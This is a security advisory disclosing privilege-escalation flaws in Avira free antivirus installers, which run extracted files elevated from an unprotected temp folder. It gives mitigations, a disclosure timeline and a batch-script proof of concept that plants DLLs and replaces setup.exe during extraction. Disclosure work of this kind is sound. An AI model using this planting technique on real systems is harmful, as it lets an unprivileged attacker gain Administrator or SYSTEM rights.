Hi @ll,
Avira's free antivirus full package executable installers,
avira_antivirus_en-us.exe, avira_antivirus_de-de.exe etc.,
available from
<https://www.avira.com/en/download/product/avira-free-antivirus>,
<https://www.avira.com/de/download/product/avira-free-antivirus>
etc., have multiple vulnerabilities:
1. the full package executable installers (really: self-
extracting RAR archives) extract their payload (the real
installer) into the directory "%TEMP%\RarSFX0\"
This directory is NOT protected against tampering, i.e. the
extracted payload can be replaced by an unprivileged attacker
who has access to the respective user account, or by malware
already running under this user account.
2. after extraction the self-extractor starts the unpacked
"%TEMP%\RarSFX0\presetup.exe" ELEVATED, eventually
displaying an UAC prompt.
An unprivileged attacker who modified "%TEMP%\RarSFX0\presetup.exe"
between extraction and execution can trick the user to start a
rogue program with administrative privileges.
3. "%TEMP%\RarSFX0\presetup.exe" loads multiple (system) DLLs
from its application directory "%TEMP%\RarSFX0\", and starts
several programs, for example "%TEMP%\RarSFX0\setup.exe".
All these DLLs and programs are executed with administrative
privileges too; an unprivileged attacker who (re)placed these
files in "%TEMP%\RarSFX0\" gains escalation of privilege to
"Administrator".
4. "%TEMP%\RarSFX0\setup.exe" installs several Windows services
which run under the SYSTEM account.
An unprivileged attacker who replaced the service executables in
"%TEMP%\RarSFX0\" gains escalation of privilege to "SYSTEM".
Proof of concept:
~~~~~~~~~~~~~~~~~
1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
and <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
and save them in your "Downloads" directory;
2. create the following batch script in an arbitrary directory:
--- POC.CMD ---
:WAIT_DLL
@If Not Exist "%TEMP%\RarSFX0" Goto :WAIT_DLL
For %%! In (UXTheme Version DWMAPI) Do @Copy "%USERPROFILE%\Downloads\SENTINEL.DLL" "%TEMP%\RarSFX0\%%!.DLL"
:WAIT_EXE
@If Not Exist "%TEMP%\RarSFX0\setup.exe" Goto :WAIT_EXE
Copy "%USERPROFILE%\Downloads\SENTINEL.EXE" "%TEMP%\RarSFX0\setup.exe"
--- EOF ---
3. download "avira_antivirus_en-us.exe" and save it in your
"Downloads" directory;
4. start the batch script POC.CMD;
5. start the downloaded "avira_antivirus_en-us.exe" and notice
the message boxes displayed from the DLLs and EXE placed in
"%TEMP%\RarSFX0\" by POC.CMD
PWNED!
Mitigations:
~~~~~~~~~~~~
* Don't use executable installers! NEVER!
* Don't use crapware which runs executables from unsafe
directories like %TEMP%!
* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
<https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
decode it to "deny execution of files in this directory for
everyone, inheritable to all files in all subdirectories".
stay tuned
Stefan Kanthak
PS: of course Avira's anti-virus has some more beginner's errors:
outdated and vulnerable 3rd-party libraries!
- libcurl.dll 7.39.0
the current version is 7.50.1, with MULTIPLE fixed vulnerabilties;
see <https://curl.haxx.se/docs/vulnerabilities.html>
- ssleay32.dll and libeay32.dll 1.0.2.5 from OpenSSL 1.0.2e
the current version is 1.0.2h, with MULTIPLE fixed vulnerabilities;
see <https://openssl.org/news/vulnerabilities.html>
Timeline:
~~~~~~~~~
2016-07-15 vulnerability report sent to vendor
NO RESPONSE, not even an acknowledgement of receipt
2016-08-29 report published